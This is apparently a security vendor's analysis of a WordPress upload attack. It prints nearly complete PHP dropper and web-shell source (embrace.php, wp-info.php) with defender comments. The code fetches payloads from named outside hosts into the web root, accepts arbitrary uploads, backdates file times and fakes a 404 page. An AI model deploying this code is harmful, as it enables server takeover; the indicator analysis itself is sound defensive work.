In WordPress themes there are lots of file upload vulnerabilities.
This attack tries to upload the file embrace.php to the server and execute it.
embrace.php
// Turn on reporting for every PHP error level (-1 selects all of them).
error_reporting(-1);
/**
 * Downloader helper of the sample: fetch the body of $url over HTTP.
 *
 * Makes up to three attempts and stops as soon as one yields a non-empty
 * result. cURL is used when the extension is loaded; otherwise the request
 * goes through file_get_contents() with a stream context.
 *
 * Defender note: the User-Agent is a fixed literal whose "rv:" token (40.0)
 * does not match its "Firefox/" version (43.1). Outbound requests from the
 * web server's PHP process carrying this exact string are a trait worth
 * matching in egress or proxy logs.
 *
 * @param string $url Address to download.
 * @return string|false Result of the last attempt: the response body, or
 *                      false (possibly an empty string) when no attempt
 *                      produced content.
 */
function fetch_url($url) {
$contents = false;
$errs = 0;
// Retry while the previous result is falsy; $errs++ < 3 caps this at three passes.
while ( !$contents && ($errs++ < 3) )
{
// Hard-coded browser-like identity sent with every request.
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1';
if (extension_loaded('curl') && function_exists('curl_init')) {
$c = curl_init($url);
// Redirects are followed, so the final host may differ from the one in $url.
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
// Return the body from curl_exec() instead of printing it.
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
// Anything other than a final HTTP 200 is treated as a failed attempt.
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
// Fallback without cURL: same User-Agent via an HTTP stream context.
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
// "@" hides warnings, so a failed fetch leaves no PHP warning behind.
$contents = @file_get_contents($url, false, $context);
}
}
return $contents;
}
// Request dispatcher of the sample. The action is chosen by which request
// parameter is present: "doit", "up" or "f3"; nothing in this listing checks
// who is sending the request.
//
// Defender note: the fixed response strings ("Teddy-is-here", "Teddy-done",
// "Teddy already in place", "Done ==>") and the dropped file names are usable
// as indicators when reviewing access logs, response bodies and the web root.
// Finding any of these files means the upload path was already abused, so the
// whole document root should be reviewed, not only the named files.
$test=$_SERVER['DOCUMENT_ROOT'];
// "doit": place a second-stage file named wp-info.php in the document root.
if(isset($_REQUEST['doit'])){
if (file_exists("$test/wp-info.php")){
echo "Teddy already in place";
}
else{
// The remote ".txt" content is saved under a .php name; the result of
// fetch_url() is written without checking whether the download failed.
$link = fetch_url("http://www.wayiview.com/license.txt");
file_put_contents("$test/wp-info.php", $link);
echo "Teddy-done";
}
}
// "up": file upload handler.
elseif(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
// $filedir is empty, so the target path is just the client-supplied name,
// resolved against the script's working directory.
$filedir = "";
// $maxfile is assigned but never read: no size limit is enforced here.
$maxfile = '2888888';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
// No check of extension or content type; "@" hides any failure of the move.
@move_uploaded_file($userfile_tmp, $abod);
echo"<center><b>Done ==> <a href='./$userfile_name'>$userfile_name</a></b></center>";
}
}
else{
// Without a submitted form: print the host's OS details and an upload form.
echo '<b>'.php_uname().'</b>';
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
}
// "f3": fetch a further payload and store it under a generated name.
elseif(isset($_REQUEST['f3'])){
// One of five hard-coded domain suffixes is picked at random per request, so
// blocking a single host name does not cover the whole set.
$dom = array_rand(array_flip(array("ml", "cf", "ga", "gq", "cu.cc")), 1);
// uniqid() returns a 13-character hexadecimal string by default; such
// <13 hex chars>.php file names are a hunting pattern for dropped copies.
$shname3 = uniqid();
$f3 = fetch_url("http://comxvas.$dom/3.txt");
$shnam3 = ("./$shname3.php");
file_put_contents($shnam3, $f3);
echo"<center><b>Done ==> <a href='./".$shname3.".php'>".$shname3.".php</a></b></center>";
// Backdates the file's modification time by a random 30 to 365 days, which
// defeats "recently modified" searches. On typical Unix filesystems the
// inode change time (ctime) is not set by touch(), so a ctime much newer
// than mtime is a sign of this kind of tampering.
touch("./$shname3.php", time() - mt_rand(60*60*24*30, 60*60*24*365));
}
else {
// No recognised parameter: print a fixed marker string.
echo "Teddy-is-here";
}
wp-info.php
This malware can download more and more malware to the server and gain full control of it.
/**
 * Downloader helper of wp-info.php: fetch the body of $url over HTTP.
 *
 * Makes up to three attempts and stops as soon as one yields a non-empty
 * result. cURL is used when the extension is loaded; otherwise the request
 * goes through file_get_contents() with a stream context.
 *
 * Defender note: the User-Agent literal here ends in " googlebot" appended
 * to a Firefox-style string. That combination is a fixed trait of this file
 * and can be matched in egress or proxy logs.
 *
 * @param string $url Address to download.
 * @return string|false Result of the last attempt: the response body, or
 *                      false (possibly an empty string) when no attempt
 *                      produced content.
 */
function fetch_url($url) {
$contents = false;
$errs = 0;
// Retry while the previous result is falsy; $errs++ < 3 caps this at three passes.
while ( !$contents && ($errs++ < 3) )
{
// Hard-coded identity sent with every request.
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1 googlebot';
if (extension_loaded('curl') && function_exists('curl_init')) {
$c = curl_init($url);
// Redirects are followed, so the final host may differ from the one in $url.
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
// Return the body from curl_exec() instead of printing it.
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
// Anything other than a final HTTP 200 is treated as a failed attempt.
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
// Fallback without cURL: same User-Agent via an HTTP stream context.
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
// "@" hides warnings, so a failed fetch leaves no PHP warning behind.
$contents = @file_get_contents($url, false, $context);
}
}
return $contents;
}
// Excerpt of the wp-info.php dispatcher; the article elides the upload branch
// with dots and the listing ends before the outer block is closed.
if(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
.
.
.
}
else{
// With "up" present but no submitted form, the script prints a hand-built
// "404 Not Found" page. The text is produced by echo; this excerpt shows no
// call that changes the HTTP status code, so a "Not Found" body served with
// a 200 status for this path is worth checking for in access logs.
echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<h1>Not Found (404)</h1>
The requested URL ";
// The request URI is printed as received, without HTML escaping.
echo $_SERVER['REQUEST_URI'];
echo "
was not found on this server.
<hr>
";
echo $_SERVER['SERVER_NAME'];
}
Final words
Websites that use Malware Expert – ModSecurity rules are protected against this attack.
Use Malware Expert – Signatures to detect this malware in files for FREE!